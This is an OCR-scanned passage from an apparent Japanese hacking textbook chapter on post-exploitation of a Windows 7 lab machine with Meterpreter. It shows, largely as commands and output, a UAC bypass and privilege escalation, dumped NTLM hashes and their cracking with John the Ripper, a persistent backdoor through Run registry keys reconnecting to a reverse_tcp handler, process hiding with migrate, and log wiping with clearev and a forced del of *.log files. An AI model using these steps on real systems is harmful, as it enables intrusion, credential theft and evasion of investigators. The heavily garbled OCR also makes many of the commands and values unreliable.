ファ イル ) で 管理 され て いま す 。 パ スワ ー ド は 平文 で は な く 、 ハ ッシュ の 形式 で 
記録 され て いま す 。 こ れ を パス ワー ド ハ ッ シュ と いい ます 。 

Meterpreter プロ ンプ ト に 次 の コマ ンド を 入力 し て 、 パ スワ ー ド ハッ シュ の 秦 
取 を 試み ます 。 
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し か し 、 エ ラー が 発生 し て うま くい きま せん 。 こ れ は 侵入 し て いる ユー ザー の 
権限 が 低い た めで す 。 

Meterpreter に は SYSTEM 権限 へ の 昇格 を 試み る getsystem コ マン ド が 用 意 さ 
れ て いま す 。 し か し 、 こ れ を 実行 し た と ころ 、 次 の よう に エラ ー が 発生 し ます 。 





管理 者 権限 が な けれ ば 、 パ スワ ー ド ハッ シュ を 奪取 で き な い だ け で な く 、 他 の 
揉 作 に も 制限 が か か り ま す 。 例え ば 、'C:\Windows\System32" 以下 の ファ イル を 
近作 で きま せん 。 

そこ で 、 権限 を 昇格 させ る た め の モ ジュ ー ル を 試み ます 。 そ の た め に は 、 一 度 
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msf プ ロン プ ト に 戻り ます 。Meterpreter プロ ンプ ト で background コ マン ド を 人 入 
力 す る と 、 Meterpreter セ モッ ショ ン (リバ ー ス シェ ル と 接続 済み ) が バッ ク グ ラウ 
ンド に 回 され 、msf プロ ンプ ト に な り ま す 。 





接続 中 の Meterpreter モッ ショ ン を 確認 する に は 、sessions 1 コマ ンド (ある い 
は 引数 な し の sessions コマ ンド ) を 実行 し ます 。 





Meterpreter セ モッ ショ ン に 戻り た い 場 合 に は 、「sessions : < セッ ショ ン ID>」 
(ある い は 「sessions < セッ ショ ン 1ID>」) を 入力 し ます 。 





ここ で は 、 再 び msf プ ロン プ ト に 戻っ て お きま す 。 getsystem コ マン ド で 
SYSTEM 権 限 を 奪取 で き な か っ た の は 、UAC 機 能 に より プロ ッ ク さ れ て し まっ 
た た めで す 。 そこで 、UAC 機 能 を バイ パス する モジ ュー ル (exploit/windows/ 
local/bypassuac') を 用 いま す 。 確立 済み の セッ ショ ン (ここ で は セッ ショ ン 1) を 
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通じ て 、Exploit を 送り 込み ます 。 
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モジ ュー ル の 設定 を 終 を た の で 、exploit コマ ンド で 実行 し ます 。 


エラ プー が 出 な いで Meterpreter プ ロン プ ト が 返っ た の で 成功 


| 第 2 部 | ハッ キン グ を 体験 する 





Windows 7 の 画面 に は ほとん と 変化 が 現れ ず 、 タ ー ゲ ッ ト 上 端末 の 探 作者 に 何ら 
か の アク ショ ン を 起こ させ る 必要 も な い の で 、 こ の 攻撃 は 非常 に エレ ガン ト と い 
えま す 。Meterpreter プロ ンプ ト が 返っ て きま す が 、 こ れ は セッ ショ ン 2 に な っ て 
いま す 。 こ の まま 、getsystem コマ ンド を 実行 し ます 。 


画 特権 上 昇 を 試み る 


画 SYSTEM 権 限 を 礁 取 し た 





SYSTEM 権限 に な っ た こと が わか り ま す 。 こ れ で 准 備 が 整っ た の で 、 次 の よう 
に 入力 し て パス ワー ド ハ ッ シュ を ダン プ し ます 。 





パス ワー ド ハ ッ シュ の 行 を コピ ー 尼 ペー スト で テキ スト ファ イル に 貼り 付け て 
保存 し ます 。 こ こ で は "/root/hash.txt' ファ イル に 保存 し まし た 。 
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Poot 引 ka11:<# ca て hash.tx 二 

Administrator : 599 : aad3b435b51494eeaad3b435b51494ee :.」 
Tc525c9683e8fTe967995ba2ddc971889: : : 

Guest : 591 : aad3b435b51494eeaad3b435b51494ee : -! 
31d6cfe9d16ae931b73c59d7e9c989c9: : : 

TEUser : 1999 : aad3b435b51494eeaad3b435b51494ee : | 
Tc525c9683e8fe967995ba2ddc971889: : : 

sshd : 1991 : aad3b435b51494eeaad3b435b51494ee :。 」 
31d6cfe9d16ae931b73c59d7e9c989c9: : : 

sshd server : 1992 : aad3b435b51494eeaad3b435b51494ee : 
8d9a16cfc961c3359db455d99ec27935 : : : 


⑩ パ スワ ー ド を 解析 する 

Kali に は 高 機能 な オフ ライ ン パ スワ ー ド クラ ッ カ ー で ある ohn the Ripper が イ 
ンス トー ル さ れ て いま す 。 パ スワ ー ド ハッ シュ (ある い は 暗号 化 さ きれ た パス ワー 
ド ) か ら パ スワ リード を 特定 し よう と 試み ます 。 

基本 的 な パス ワー ド 解 析 の アプ ロー チ と し て 、 次 が 挙げ られ ます 。 


① 辞 書式 攻撃 
② 総 当たり 攻撃 


一 般 に は 辞書 式 攻撃 に 失敗 し た ら 、 総 当たり 攻撃 を 行い ます 。 こ こ で は 、John 
the Ripper に 付属 し て いる パス ワー ド フ ァイル (/usr/share/john/passWord.lst ) 
を 用 いて 辞書 式 攻撃 を 試し て み ま す 。 な お 、 総 当たり 攻撃 に つい て は 、 別 の と こ 
ろ で 紹介 し ます 14)。 


Foot 引 ka11:<# ]ohn hash.txt --show 解析 結果 を 表示 。 
9 password hashes cracked, 5 left まだ 解析 前 な の で 成功 し た も の は な い 。 
root@ka1i:<# ohn --word1ist=/usr/share/]ohn/password. 1st. 」 





*14 : ohn the Ripper に よる 総 当 た り 攻 撃 に つい て は 、5.2 を 参照 し て くだ さい 。 
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- -format:nt hash.txt 
Using defau]t input encoding: UTF-8 
Loaded 3 password hashes with no different sa]ts。」 
(NT [MD4 128/128 AVX 4x3] ) 
Remann1ng 1 password hash 
Press "q′ or Ctrl -C to abort, al1most any other key for status 
9g 9:99:99:99 DONE (2918-97-27 23:19) 9g/s 88675p/s 88675c/s。」 
88675C/s dirk. .msfadmnn 
Sess1on Completed 


辞書 ファ イル の サイ ズ や 解析 対象 の ハッ シュ 数 に も より ます が 、 す ぐに 完了 す 
る は ず で す 。 出 力 結 果 を 見 る と 、 パ スワ ー ド 解析 に 成功 し た アカ ウン ト は あり ま 
せん で し た 。 

実験 と し て 、Tohn the Ripper の 辞書 ファ イル を コビー し て 、 こ れ に 既知 で ある 
パス ワー ド PasswOrd!' を 追記 し て か ら 、 パ スワ リー ド 解 析 し ます 。 


root 央 aq11:<# CD /usr/share/]ohn/password.1st password.1st 

root 個 a11i:<# echo "Passw9rd!" >> password.1st 

root 央 aq11:<# ]Ohn --wordlist=password.1st --format:nt hash.txt 

Using default input encoding: UTF-8 

Loaded 3 password hashes with no different salts (NT [MD4 128/128 AVX 4x3]) 
Remaining 2 password hashes with no different salts 

Press "q′ or Ctrl-C to abort, almost any other key for status 

Passw9rd! (Administrator ) Administrator ユ ー ザ ー の パス ワー ド は *Passw6rd! "と 判明 し た 。 
1g 9:99:99:99 DONE (2918-97-27 23:95) 19.99g/s 35489p/s 35480c/s 79969C/s。」 
dirk. .Passw9rd! 

Marning: DasSwords printed above might not be al]1 those cracked 

Use the "--show" option to display al1] of the cracked passwords reliably 
Session completed 





先ほど の 出力 結果 と は 合い 、 解 析 に 成功 し た アカ ウン ト (ユー ザー 名 と パス 
ワー ド ) が 表示 され て いま す 。 
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⑪ 不 要 な セッ ショ ン を 閉じ る 
一 度 セ モッ ショ ン 2 か ら 抜 け て 、 全 体 の セッ ショ ン を 確認 し ます 。 





セッ ショ シ ジ 1 と 2 は 同一 ター ゲッ ト に 対す る セッ ショ ン で あり 、 モ ッ シ ョ ン 2 で 
は は SYSTEM 権限 に な っ て いる た め 、 セ ッ シ ョ ン 1 は 不要 と いえ ます 。 ターゲット 
端末 の タス クマ ネー ジャ ー の 「Process」 タブ に は "evilexe" と 表示 され ます 。 こ 
れ を 消し て お け ば 、 侵 入 が ば ぱ ばれ に くい と いえ ます 。 セ ッ シ ョ ン を 閉じ る に は 、-k オ 
プシ ョ ン で セッ ショ ン D を 指定 し ます 。 





3⑫ シ ステ ム 情 報 を 収集 する 

セッ ショ ン 2 の Meterpreter プロ ンプ ト に 移行 し ます 。 run scraper コマ ンド で 、 
様々 な シス テム 情報 を 収集 し て み ま す 。 こ の 情報 に は レジ スト リ 、 パ スワ ー ド 
ハッ シュ な ど が 含ま れ ま す 。 レ ジス トリ 全体 を 取得 する の で 、 若 十 時 間 が か か り 
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収集 し た 情報 は 自動 的 に ダウ ン ロ ー ド され 、"/.msf4/logs/scripts/scraper/ く < 
ター ゲッ ト 端 末 の IP アド レス >-< 日 付 >.< 数 値 列 >" ディ レク トリ 配下 に 保存 さ 
れ ま す 。 





⑬ シ ステ ム の 内 部 情報 に アク セス する 
Meterpreter プロ ンプ ト か ら シ ェ ル (Windows で は cmd.exe、、 す な わ ち コマ ン 
ドド プロンプト) に 切り 夫 え る に は 、 次 の よう に し ます 。 





| 第 4 章 | Windows の ハッ キン グ ブ 257 


一 革 = に あの Np = ピル さも.) 





Windows に は 、 WMI(Windows Management Instrumentation) と いう Windows 
シス テム を 管理 する た め の イ ンタ ー フ ェ ー ス が 備わっ て いま す 。WMI を 利用 する 
と 、Windows シ ステ ム の 内 部 情報 に アク セス で きま す 。 コ マン ド プ ロン プ ト で 
wmic を 使え ば 、WMI に アク セス で きま す 。 例え ば 、 次 の よう に 入力 する と 、 自 
動 起動 の 内 容 を 列挙 で きま す 。 





3⑭ 自 動 で ベイ ロー ド が 実行 され る よう に する (永続 的 な バッ ク ド ア を 設置 する ) 

ター ゲッ ト 上 端末 が 終了 すれ ば 、 セ ッ シ ョ ン が 閉じ ます 。 タ ー ゲ ッ ト が 再び ペイ 
ロー ド を 起動 すれ ば セッ ショ ン が 確立 され ます 。 し か し 、 そ の チャ ンス は も うな 
いと 考え て よい で し ょ う 。 そ こ で 、 セ ッ シ ョ ン が 確立 し て いる 間 に 、Windows 7 
の 起動 時 に 自動 で ペイ ロー ド を 実行 する よう に 設定 し て お くべ き で す 。 

ここ で は 、Meterpreter プロ ンプ ト に 用 意 さ れ て いる run persistence コ マン ド 
を 用 いま す (*15) 。 様々 な オプ ショ ン が ある の で 、 一 度 run persistence h コ マン 
ド で ヘル プ を 確認 し て くだ さい 。 

こと で は 、 決 の よう に 大 力 し ます 。 
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*15 : persistence は 、Exploit で も 用 意 き れ て いま す 。FExploit の 設定 例 は 、 次 の 通り で す 。 


ィ ーーーーーーーーーーーーーーーー-] ーーーーーーーーーーーーーーーー 
プロ セス 名 に な る の で 、 ば れ に くい 名 前 に する 





うま くい け ば 、 タ ー ゲ ッ ト 端 末 の 自動 起動 の レジ スト リ ("HKCU\Software\Microsoft\Window 
s\CurrentVersion\Run") に 登録 され ます 。 Windows の タス クマ ネー ジャ ー で プロ セス を 確認 す 
る と 、"servicelexe' を 確認 で きま す 。 
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-X: シス テム 起動 時 に 自動 的 に 開始 する (接続 用 エー ジェ ント を 起動 する ) 。 
-1 : 接続 を 試み る 間隔 。 単 位 は 秒 。 

-P : ペイ ロー ド を 使う 。 こ れ 以 降 は ペイロード の オプ ショ ン と し て 扱わ れる 。 
-p : ペイ ロー ド の 接続 先 の ポー ト 番 号 。 

-rh: ペイ ロー ド の 接続 先 の rP ア ドレ ス 。 


Windows 7 で どう いっ た 変更 が 加え られ た の か を Sysinternals の Autoruns で 確 
認 し ます 。Autoruns を 起動 し 、 メ ニュ ー の 「File」 > 「Compare」 か ら 、 初 期 設 
定 で 作成 し た arn ファ イル を 指定 し ます 。 する と 、 レジ スト リ HKLM\SOFTWA 
ea に pyqalInaMBKCfSA′" と いう 

ー が 追加 きれ 、 そ の 値 は c:\users\ieuser\appdata\local\temp\oxwdrhk. 
Fr に 設定 され て いる こと が わか り ま す ( 図 4.17)。 こ の レジ スト リ は 、 シ ステ ム 
起動 時 に 自動 実行 さす せる プロ グラ ム を 登録 する 場所 で す (で *16)。 


FErYES キレ ーーー| 

















4-17 実験 前 と の 比較 結果 


*16: ここ まで わか れ ば 、 こ の タイ プ の バッ ク ド ア を 削除 する 方 法 が わか り ま す 。 パ バッ ク ド ア を 除 
ます る に は 、 自 動 起動 の パッ ク ド ア の レジ スト リ 値 を 削除 し 、VBS フ ァイル も 削除 し ます 。 
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"oxwdrhk.vbs ファ イル を テキ スト エディ ター で 開く と 、 ソ ー ス コー ド を 確認 
で きま す 。 し か し 、 一 部 が Base64 で 難読 化 さ れ て お り 、 そ の まま で は 読み 取れ な 
いよ うに な っ て いま す ( 図 4-18) 。 


| 鞭 。 


Fic Ed ーーm Virw - 
FurniCt for vwkE NpuzpxNrdCTrPefcNaonrxcy) 
AMMUMVODE 


ExXCAhXEPS1 YE BOAAPVKXYa8 人 2YFsqA11X8UvSVhCEAAA3 
いり 


E6TtV/1P)/6P6r8DyrvdcS 9pv//1hP220L vUW2NfQR// ひ icOU 

3AAC+X1P1W4UKXCO ロ WX う A+VE 00D2ehNAAIEROAEDEKAAZEZAG)O 

ee AOO 58CCE ーー の かー An 

F 5QAMAAHTDGATEEwAAAIN+CAEPhZ4AAACh/BdBAEt て OBFSR6FOEJoCLDT VQ e60E 5APGLHC 
FC エ TsdoAJBGOS9DAZBAAPYd9d11R2OOEEA1T2KAKHK11YY104UA9AFTyT ImwT エ 10FABF ア P ア //BCxC NDyOADPDTAAKGOC 0EAvIhWwcCOEA11YE1X9ACAAAT5 
ON1AAP/w3dbQLOQqwkEoqdBOE< ] RCIROEPEP で SEA 1 SHCNOSPYRBOB9SFJPTL ADSTMB7ATTTY 
R1VwC6PVPArymVCVLVe2bR20L RGhTOV う 06 う 2PAM ト そ 1 OSWVRESA0PAAFA 和 RAG0C101G1 ユ VH は ABT312ASE111.R6L eKSACLCS7a6cOb908 | 
VRMFCAKGSAKEAHBOUqmwGBTkLyyD/hqpkAqHKFSYMeTUFOMZkKroOsVyAtBANH4weAFASjbAGoC10111qYh1A81 31qA8t111jR6GLevSACLCE7a5xdhKE 。 





図 4418 ソー スコ ー ド は Base64 で 難読 化 さ れ て いる 


それ で は 、Windows 7 の 再起 動 時 に 自動 的 に セッ ショ ン が 確立 する こと を 確認 
し ます 。Windows 7 を 終了 させ る と 、Kali 側 で は モッ ショ ン 2 が 閉じ ます 。 


meterDreter > 

[|*] 19.9.9.192 - Meterpreter sess1on 2 closed. Reason: Died 
Meterpreter プ ロン プ ト を 出し た まま 、 セ ッ シ ョ ン が 閉じ た と き は こう な る 。 

ms† explo1t(w1ndows/1oca1/bypassuac) > 






Kali 側 で は 、 ス テッ プ ⑤ と 同様 に し て 、 リ バー スシ ェ ル (reverse_tcp) の 待ち 
受け 状態 を 作り 直し ます 。 


ms 千 > use explo ユ て /mult ュ /handler 

ms 和 f exploit(multi/hand1er) > set pay1oad windows/meterpreter/.! 
PeVerse て CD 

payload => winndows/meterpreter/reverse て tcp 

ms 和 † exploit(multi/handler) > set LHOST 19.9.9.2 

LHOST => 19.9.9.2 

ms 和 † exploi て (multi/handler ) > exploit 


[*] Started reverse TCP handler on 19.9.9.2:4444 
(待ち 状態 に な る ) 
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Windows 7 を 起動 し ます 。 デ スク トッ プ 画 面 が 表示 され た タイ ミン グ で 、Kali 
側 で Meterpreter セ モッ ショ ン が 確立 し ます 。 





シス テム が 稼働 し て いる 聞 、 定 期 的 に セッ ショ ン を 確立 し よう と 試み ます 。 上 
記 の 例 で は |「-: 60」 を 指定 し た の で 、60 秒 ご と に 処理 が 走り ます 。 セ モ セッション が 
確立 済み で あっ て も 、 そ う で な く て も 動作 し 続け ます 。 そ の た め 、 再 び Kali 側 で 
リバ ー ス シェ ル の 待ち 受け 状態 を 作れ ば 、 再 び セ モッ ショ ン が 確立 し ます 。 ま た 、 待 
機 時 間 ( 秒 数 ) を 短く し すぎ る と 、 タ ー ゲ ッ ト 端 末 に その 分 だ け 負 荷 が か か る の 
で 、 注 意 が 必要 で す 。 以 上 で 、 永 続 的 な バック ドア が 完成 し た と いえ ます 。 


$⑮ ロ グ を 削除 する 

Windows に 侵入 し た 形跡 は ログ と いう 形 で 残り ます 。 追跡 を 免れ る た め に は 、 
ログ を 削除 し た り 、 改 ざん し た り し ます 。 改ざん する ほう が 発覚 する 恐 れ が 少な 
い の で より エレ ガン ト と いえ ます が 、 削 除 す る だ け で も 有効 で す 。 管理 者 が 攻撃 
に 気付 いた と し て も 、 ロ グ が 削除 され て いれ ば 攻撃 の 詳細 が わか ら な いか ら で す 。 
結果 と し て 追跡 も 困難 に な り ま す 。 

Windows シス テム の ログ は イベ ント ログ と いう 形 で 記録 され 、 イ ベン トビ ュー 
アー で 確認 で きま す 。 ス ター トメ ニュ ー か ら コ マン ド 入 力 欄 を 開き 、「eventvwr. 
msc| を 入力 し ます 。 す る と 、 イ ベン トビ ュー アー が 表示 され ます 。 

主 な イベ ント ログ に は 、 表 4.2 の 3 種類 が あり ます 。 
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表 4.2 イベ ント ログ の 種類 


障 6 


アプ リケーション (Application) cu エラ ー 情 報 


Windows シス テム が 記録 する 情報 を 保存 する 。 特定 ファ イル 
セキ ュ リ ティ (Security) の 喜 み 取り 失敗 、 ロ グ オ ン の 成 右 な ど 。 


標準 サー ビス 、 デ バイ ス ド ラ イ バ ー、OS ブー ト サ ー ビ ス な ど 
システム (System) が 記録 する 情報 を 保存 する 。 ハ ー ド ウェ アエラ ー、 OS 起動 時 
の エラ ー な ど 。 





Meterpreter プロ ンプ ト に て SYSTEM 権限 で clearev コ マン ド を 使う と 、 こ の 3 
種類 の イベ ント ログ が 消去 され ます ( 図 4-19)。 


meterpreter > clearev 

[*] Mipnng 2857 records from Application. . . 
[*] Miping 8555 records from System. . . 

[*] Miping 6276 records from Secur+ty . . . 


に cmoided yens 
) 記 APPiecsbonz spd Serucc= Lc 
- コ Subscmptoms 


Event 4572. Microcoft WWihlowt cocbrEy auditino. 
Ge 
Spectal Pemieoes asacmed to nur iogon- 
Aitech Tesk To Thp-, 
て epy 











| ea- た IE 本 に タン 4 ロリ トミ ニョ 





| 第 4 章 | Windows の ハッ キン グ 263 


Fie Acben Viemw Hep 


ゃ き | = 回 同 





ik Currsnt Lod.. 

当 Propees 

寺 fm 。 

可 Smwvc AEyrt As 
AtKach sfask To th、。 
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図 4-19 clearev コマ ンド の 実行 前 後 


ここ で は Meterpreter の モッ ショ ン を 確立 し て いる の で 、clearev の 力 に 頼り ま 
し た 。 

他 の アプ ロー チ で 侵入 し て いる 場合 に は 、 ClearLogs と いう ログ 消し ツー ル を 利 
用 で きま す 。 何らかの 理由 に より 、「 フ ァイル の 転送 が 難し い 」「 イ ンス トー ル す 
る 暇 が な い 」 と いう 状況 で あれ ば 、 少し 乱暴 で す が del コ マン ド を 用 いま す 。 これ 
に より 、Windows の シス テム フォ ル ダ に 含ま れる 、 拡張 子 が 「log] の ファ イル を 
すべ て 強制 的 に 削除 し ます 。 実際 に 実行 する 前 に 、Windows 側 で C:\Windows' 
フォ ル ダ ー (Windows 7 で の 「%WINDIR%」 に 対応 ) 内 に log の ファ イル が あ 
る こと を 確認 し ます 。 エク スプ ロー ラー で の 検索 結果 、 合計 59 件 見 つか り ま し た 。 
それ で は 、del コ マン ド を 実行 し て み ま す ( 図 4-20)。 


C:\Mindows\system32>de1] %MTNDIR%\*.1og /a /s /q /f 


/a : 削除 ファ イル の 属性 を 指定 する 。 

/s : サブ フォ ル ダ も 対象 と する 。 

/q : ワイ ルド カー ド 使 用 時 に 確認 メッ セー ジ を 表示 し な い 。 
/f : 読み 取り 専用 ファ イル を 強制 的 に 削除 する 。 
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図 4.20 del コ マン ド の 実行 前 後 


一 部 の ログ ファ イル (この 例 で は 6 件 ) 
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以上 で 、 侵 入 後に 行わ れる 操作 に つい て の 説明 は 終わ り で す 。 情報 の 奪取 、 権 
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限 昇格 、 バ ッ ク ド ア の 設置 、 ロ グ 消 し と いっ た 一 連 の 流れ を 経 ま し た 。 実際 の ハッ 
キン グ で は 、 掌 握 し た この シス テム を 踏み 台 に し て 、 新 た な ター ゲッ ト を 探し ま 
す (17)。 


自動 起動 に 関す る レジ スト リ 
自 コ マン ド や サー ビス の 自動 起動 を 設定 する レジ スト リ は 、 表 4.3 の 通り で す 。 


表 4-3 自動 起動 に 関す る レジ スト リ 


全 ユ ー ザ ー に 対す る 自動 実行 (コマ ンド ) 


HKLM\Software\Microsoft\Windows\ Po 
CurrentVersion\Run ログ イン 時 に 毎回 実行 する 。 


HKLM\Software\Microsoft\Windows\ 4 イン 時 に 1 度 だ け 実 行 す る 。 実行 後 は 値 が 削除 
CurrentVersion\RunOnce れる 。 
HKLM\Software\Microsoft\Windows\ 2 ン 時 に 1 度 だ け 実 行 する 。 実 行 後 は 値 が 削除 


CurrentVerslon\HunOnceEX rc と は 異な り 、 実 行 順序 を 制御 で きる 。 


現在 ログ イン し て いる ユー ザー に 対す る 自動 実行 (コマ ンド ) 


HKCU\Software\Microsoft\Windows\ eo 
CurrentVersion\Run ログ イン 時 に 毎回 実行 する 。 


HKCU\Software\Microsoft\Windows\ | ログ イン 時 に 1 度 だ け 実 行 す る 。 実 行 後 は 値 が 削除 
CurrentVersion\RunOnce され る 。 


HKCU\Software\Microsoft\Windows\ に ン 時 に 1 度 だ け 実 行 する 。 実 行 後 は 値 が 削 際 


CurrentVersion\RHunOnceEx lo と は 異な り 、 実 行 順序 を 制御 で きる 。 
自動 実行 (サー ビス ) 


CurrentVersion\RHunServicesOnce が 削除 され る 。 

特に 、 全 ユー ザー に 対し ログ イン 時 に 毎回 コマ ンド を 実行 する レジ スト リ で あ 
る HKLM き Software\Microsoft\Windows\CurrentVersion\Run は 、 バ ッ ク ド 
ア の 設置 に よく 使わ れ ま す 。 





*17 : 内 部 の ネッ トワ ー ク へ の 侵入 に つい て は 、10.3 を 参照 し て くだ さい 。 
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@ ベイ ロー ド の 実行 ファ イル の 自動 起動 化 


run persistence コ マン ド で バッ ク ド ア (ペイ ロー ド の 自動 起動 ) を 作成 し まし 
た 。 似 た よう な こと を 手動 で 試し て み ま す 。 違い は 現れ る で し ょ うか 。 

ここ で は 、Windows 7 の 起動 時 に "eviLexe を 実行 する よう に 、 レ ジス トリ に 登 
まし ます 。 


① む ペイ ロード を "C:\Windows" 直下 に 移動 する 

ペイ ロー ド (evilexe ファ イル ) は 、'C:\Windows' 直下 に 移動 し て お きま す 。 
以降 の 操作 は コマ ンド プロ ンプ ト と Meterpreter プロ ンプ ト の どちら も 実現 で き 
ます 。 こ こ で は Tab 補 完 (18) が 効く Meterpreter プロ ンプ ト で 操作 し ます 。 


コマ ンド プロ ンプ ト の 場合 


C:\Mindows\system32>copy "C:\Users\TEUser\Desktop\ev1i] .exe" "C:\Mindows" 
Copy "C:\Users\TEUser\Desktop\ev1l.exe" "C:\Mindows" 入力 コマ ンド の エコ ー 表 
示 な の で 無視 。 
1 file(s) copied. 
C:\Mindows\system32>de1 "C:\Users\TEUser\Desktop\evi] .exe" 
del "C:\Users\IEUser\Desktop\evi] .exe" 入力 コマ ンド の エコ ー 表 示 な の で 無視 。 








Meterpreter プ ロン プ ト の 場合 


meterpreter > cp "C:\\Users\\TEUser\\Desktop\\evi1 .exe" | 
"C:\\Mindows\\evil .exe“ 


meterpreter > rm “C:\\Users\\TEUser\\Desktop\\evi] .exe" 


②) 自 動 起動 の 設定 を 登録 する 
次 に 、 レ ジス トリ に 自動 起動 の 設定 を 登録 し ます 。 


*18 : [Tab] キー に よる 、 入 力 の 自動 補完 の こと で す 。 
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頭 『un persistence コ マン ド で 生成 され た キー 


"backdoor" が 追加 され た 





Windows 7 で レジ スト リエ ディ ター を 確認 する と 、 上 記 の 結果 と 同じ に な っ て 
いま す ( 図 4-21 ) 。 





図 44.21 レジ スト リエ ディ タ で 確認 し た 
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3 自動 起動 され る か を 確認 する 

それ で は Windows 7 を 再起 動 し て み ま す 。 す る と 、 デ スク トッ プ 画 面 が 表示 さ 
れる タイ ミン グ で 、「|Open File - Security Warning」 と いう 確認 ダイ アロ グ が 表示 
され ます ( 図 4.22)。 どうやら evilexe ファ イル を 実行 し た よう で す が 、 ダ プ ブル 
クリ ッ ク し た と き と 同 じ よ うに 確認 グイ アロ グ が 表示 され て し まい まし た 。 これ 
で は 明らか に 怪し いと いえ ip す 。 し か も 、|Always ask before opening this file」 
の チェ ッ ク を 外さ な い 限 り 、 毎 回 表示 され ます 。 
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図 4.22 起動 時 に 確認 ダイ アロ グ が 表示 され た 


persisStence で は こう し た 問題 を 回 避 す る た め に 、exe フ ァイル の 自動 起動 で は 
な く 、vbs フ ァイル の 自動 起動 を 採用 し て いる の で す 。 


借 migrate に よる 隠蔽 化 
ここ まで は ター ゲッ ト を 和 堂 握 する た め の 方 法 を 解説 し て きま し た 。 こ こ か ら は 、 
痢 し た ハッ キン グ テ ク ニッ ク に つい て 納 介 し ます ("19)。 


19 : msf プ ロン プ ト の カレ ント パス ( 例 : exploit(mulh/handler) な ど と 表示 され て いる 箇所 ) 
は 、 直 前 の 作業 に 依存 し ます 。 し か し 、 こ こ か ら の 解説 は セク ショ ン ご と に 独立 し て いる た め 、 
世 前 の 作業 が 何 を し て いた の か 不 確 定 で す 。 そ の た め 、 カ レン トバ パス も 不 確 定 で ある の で 、 そ う 
いっ た 場合 に は 、msf プ ロン プ ト を msf “"⑨⑳ > と 表記 し ます 
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migrate コ マン ド に より 、 ペ イロ ー ド の プロ セス を 隠蔽 化 で きま す 。 た だ し 、run 
persistence コマ ンド で 永続 的 な バッ ク ド ア を 作成 済み の 場合 、 す で に ペイ ロー ド 
は 隠蔽 化 き れ て いま す 。 こ の 実験 は 、run persistence コマ ンド の 実行 前 に 行っ て 
くだ さい 。 


IEUser 権 限 の "evil.exe" 

Windows 7 側 で タス クマ ネー ジャ ー を 起動 し て 、「Process」 タブ を 表示 し ます 。 
する と 、'evilexe が 存在 し ます 。 つ まり 、 裏 で 不正 な プロ グラ ム が 動作 し て いる 
こと が ば れ て し まう か も し れ ま せん 。 そこで 、"evilexe" の プロ セス を 隠蔽 化し て 、 
侵入 が ば れ に くい よう に し ます 。 

ps コマ ンド に より 、Windows 7 で 動作 し て いる プロ セ モス を 表示 で きま す 。 





隠蔽 化す る に は 、migrate コ マン ド に PID (プロ モス ID) を 指定 し ます 。 た だ 
し 、 現在 の 権限 以下 の も の を 指定 し な いと エラ ー に な り ま す 。 現在 は IEUser 権限 
で す 。 同一 権限 の プロ セス を 探す に は 、 ps コマ ンド の 出力 結果 の User に 注目 し ま 
す 。'explorerexe' は 同一 権限 に な る こと が 知ら れ て いる の で 、 こ れ を 使い ます 。 


“explorer.exe "の PTD を 調べ る 
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Filtering on "explorer . exe 


Process Lis 


PTD PPID Name Arch Session User Path 
1248 1229 explorer.exe x86 1 TE8MTN7\TEUser .」 
C:\Mindows\Explorer . EXE 
meterpreter > mingrate 1248 PID を 指定 する 。 
[*] Migrating from 1194 to 1248... 
「*] Migration completed successful1y. 





migrate コ マン ド を 実行 し た タイ ミン グ で 、 タ スク マネ ー ジ ャ ー の プロ セス か ら 
'evilexe が 消え まし た ( 図 4-23)。 










SEaa88 四 











4.23 migrate に よる 隠蔽 化 く その 1> 


な お 、migrate に よる 隠蔽 化 に 関し て 、 い くつ か の 注意 点 が あり ます 。 ま ず 、 権 
限 昇格 の 足掛かり に UAC 機 能 を 回 避 す る モジ ュー ル (exploit/windows/local/ 
bypassuac ) を 使用 する 場合 に は 注意 が 必要 で す 。 こ の モジ ュー ル は SESSION オ 
プシ ョ ン を 持ち ます 。 こ こ に mmigrate で 隠蔽 化 き れ た セッ ショ ン を 指定 する と 、 
Exploit を 実行 し て も 応答 が 返っ て こ ず 、 結 果 と し て 攻撃 に 失敗 し ます 。 つ まり 、 
SESSION オプ ショ ン を 指定 する 場合 に は 、 隠 蔽 化し て いな い セ モッ ショ ン を 指定 す 
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る よう に し ます 。 

また 、migrate に つい て 次 の よう な 人 挙動 が 見 受け られ まし た 。 migrate し た セッ 
ショ ン を 閉じ て か ら 、 新 し いい セッション で migrate を 試み た と し ます 。 こ の と き 、 
migrate 時 に どの プロ セス を 指定 し て も 、 "Error running command migrate: 
Rex:TimeoutError Operation timed out. と いう エラ ー が 発生 し 、 セ モッ ショ ン か ら 
応答 が な く な り ま し た 。 Windows 側 を 再起 動 し 直す と 、migrate で きる よう に 戻り 
まま も だ 。 


SYSTEM 権限 の セッ ショ ン の 隠蔽 化 

UAC 機 能 を 回 避 し て か ら 、 getsystem コマ ンド で SYSTEM 権限 を 奪っ た と し ま 
す 。Windows 7 の タス クマ ネー ジャ ー で プロ セス を 確認 する と 、 セ ッ シ ョ ン の 本 
体 は InjESLowSzp.exe です 。 ま た 、"'NgWmaiDpKEkjexe が 現れ た り 消 えた り 
し て いる か も し れ ま せん 。 これ は 、 自動 起動 で 動作 する バッ ク ド ア の 一 部 で す 。 定 
期 的 に Kai に アク モス し て セッ ショ ン を 確立 し よう と する プロ グラ ム で あり 、 そ 
の た め 現 れ た り 消 えた り し て いま す 。 

SYSTEM 権限 の セッ ショ ン に て 、 次 の コマ ンド を 実行 し ます 。 


meterpreter > getuid 
SerVer uSername: NT AUTHORITY\SYSTEM 
meterpreter > DS 





( 略 ) 

2896 448 svchost.exe x86 9 NT AUTHORITY\SYSTEM.- 
C:\Mindows\System32\Svchost . exe この SYSTEM 権 限 の プロ セス に 注目 。 

3244 1316 taskmgr.exe x86 1 TE8MTN7\TEUser.- 
C:\Mindows\system32\taskmgr .exe 

3496 1599 NgMmq]DpKEK].exe  x86 1 TE8MTN7\TEUser。- 
C:\Users\TEUser\AppData\Local\Temp\rad86933 .tmp\NgMmq]DDKEk]. exe 
4994 3992 Tn]jESLowSzp.exe x86 1 TE8MTN7\TEUser. 


C:\Users\TEUser\AppData\Local\Temp\Tn]ESLowSzp .exe 
meterpreter > migrate 2896 

[*] Migrating from 4994 to 2896.. . 

[*] Migration completed successfu11y. 隠 散 化 に 成功 し た 。 
meterpreter > 
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Windows 7 の タス クマ ネー ジャ ー で プロ セス を 表示 する と 、 "IniESLowSzp.exe" 
が 消え た こと を 確認 で きま す ( 図 4-24)。 
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図 4.24 migrate に よる 隠 蔽 化 く その 2> 


physxel Namoor 3 和 を 





人 @ 悪意 の ある 確認 ダイ アロ グ に よる 権限 昇格 


